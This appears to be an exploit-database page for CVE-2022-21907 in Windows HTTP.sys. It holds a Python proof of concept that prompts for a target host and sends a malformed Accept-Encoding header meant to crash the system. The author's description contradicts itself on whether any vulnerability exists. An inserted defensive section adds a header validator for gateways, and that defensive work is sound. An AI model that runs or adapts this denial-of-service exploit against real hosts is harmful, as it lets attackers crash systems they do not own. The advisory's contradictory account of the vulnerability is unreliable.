Windows 10 v21H1 – HTTP Protocol Stack Remote Code Execution

  • Author: nu11secur1ty
    Date: 2023-07-07
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51575/

    ## Title: Windows 10 v21H1 - HTTP Protocol Stack Remote Code Execution
    ## Author: nu11secur1ty
    ## Date: 01.14.2022
    ## Vendor: https://www.microsoft.com/
    ## Software: https://www.microsoft.com/en-us/download/details.aspx?id=48264
    ## Reference: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21907
    ## CVE-2022-21907
    
    
    ## Description:
    NOTE: After a couple of hours of tests and experiments, I found that
    there have been no vulnerabilities; this is just a ridiculous
    experiment of Microsoft. When I decided to install the IIS packages on
    these Windows platforms, everything was ok, and everything is patched!
    Windows Server 2019 and Windows 10 version 1809 (2018) are not
    vulnerable by default, but after I decided to upgrade from 1909 to
    2004, I found a serious problem! Windows 10 version 2004 (2020)
    is still vulnerable to the HTTP Protocol Stack (HTTP.sys). Attack
    method: buffer overflow - denial of service and restart of the system. This
    problem has existed since last year, when it was reported as CVE-2021-31166,
    and it is still there! In those days I worked on it again with the help
    and collaboration of Axel Souchet (0vercl0k), the author of the idea. On
    that day, I wrote only a one-line command to exploit this
    vulnerability!
    
    [+]Exploit:
    ```python
    #!/usr/bin/python
    # Author @nu11secur1ty
    # CVE-2022-21907
    
    from colorama import init, Fore, Back, Style
    init(convert=True)
    import requests
    import time
    
    print(Fore.RED +"Please input your host...\n")
    print(Style.RESET_ALL)
    
    print(Fore.YELLOW)
    host = input()
    print(Style.RESET_ALL)
    
    # Single string literal (the original broke the line without a continuation)
    print(Fore.BLUE + "Sending of especially malicious crafted packages, please wait...")
    print(Style.RESET_ALL)
    time.sleep(17)
    
    print(Fore.GREEN)
    # The PoC :)
    poc = requests.get(f'http://{host}/', headers = {'Accept-Encoding':
    'AAAAAAAAAAAAAAAAAAAAAAAA,\
    	 BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,\
    	 RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,\
    	 TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,\
    	 OOOAOAOOOAOOAOOOAOOOAOOOAOO,\
    	 ****************************stupiD, *, ,',})
    # Not necessary :)
    print(poc,"\n")
    print(Style.RESET_ALL)
    ```
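Added example, not part of the advisory or the author's PoC: a defender-side validator for the Accept-Encoding header, the header the PoC above abuses. It checks a value against the RFC 7231 grammar (comma-separated content-coding tokens, each with an optional q-weight) plus assumed length and element-count limits, so a reverse proxy or WAF in front of HTTP.sys can reject non-conforming values before they reach the kernel parser; the limits and function names are this example's own assumptions.

```python
import re
from typing import List

# RFC 7230 "tchar" characters, used to validate each content-coding name.
TCHAR = r"!#$%&'*+\-.^_`|~0-9A-Za-z"
_CODING_RE = re.compile(rf"^[{TCHAR}]+$")
# q-weight grammar: q=0, q=0.123, q=1, q=1.000 (at most three decimals).
_QVALUE_RE = re.compile(r"^q=(0(\.\d{0,3})?|1(\.0{0,3})?)$")

# Policy limits: assumptions for this example, not values from the advisory.
MAX_HEADER_LEN = 256
MAX_ELEMENTS = 16


def accept_encoding_findings(value: str) -> List[str]:
    """Return the reasons an Accept-Encoding value is malformed.

    An empty list means the value is within the policy limits and conforms
    to the header grammar. Empty list elements are reported even though
    RFC 7230 tells recipients to tolerate a few of them, because a strict
    gateway can drop such requests without harming legitimate clients.
    """
    findings: List[str] = []
    if len(value) > MAX_HEADER_LEN:
        findings.append(f"length {len(value)} exceeds {MAX_HEADER_LEN}")
    # Elements are separated by commas with optional surrounding whitespace.
    elements = [e.strip(" \t") for e in value.split(",")]
    if len(elements) > MAX_ELEMENTS:
        findings.append(f"{len(elements)} elements exceeds {MAX_ELEMENTS}")
    for idx, element in enumerate(elements):
        if element == "":
            findings.append(f"element {idx} is empty")
            continue
        coding, *params = [p.strip(" \t") for p in element.split(";")]
        if not _CODING_RE.match(coding):
            findings.append(f"element {idx} has non-token characters: {coding!r}")
        for param in params:
            if not _QVALUE_RE.match(param):
                findings.append(f"element {idx} has invalid parameter: {param!r}")
    return findings


def should_block(value: str) -> bool:
    """Gateway decision: reject the request if any finding was produced."""
    return bool(accept_encoding_findings(value))


if __name__ == "__main__":
    # Constructed sample shaped like the PoC value: tokens, wildcard, empty tail.
    print(accept_encoding_findings("AAAA, BB&AU&**S, *, ,"))
```

Against the PoC's own value, this check reports the excessive length and the empty list element, while the alphabetic junk itself is grammatically valid token data, which is why length and element-count limits matter alongside the character check.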
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/Windows10Exploits/tree/master/2022/CVE-2022-21907)
    
    ## Proof and Exploit
    [href](https://www.nu11secur1ty.com/2022/01/cve-2022-21907.html)
    
    ## Time spent:
    05:30:00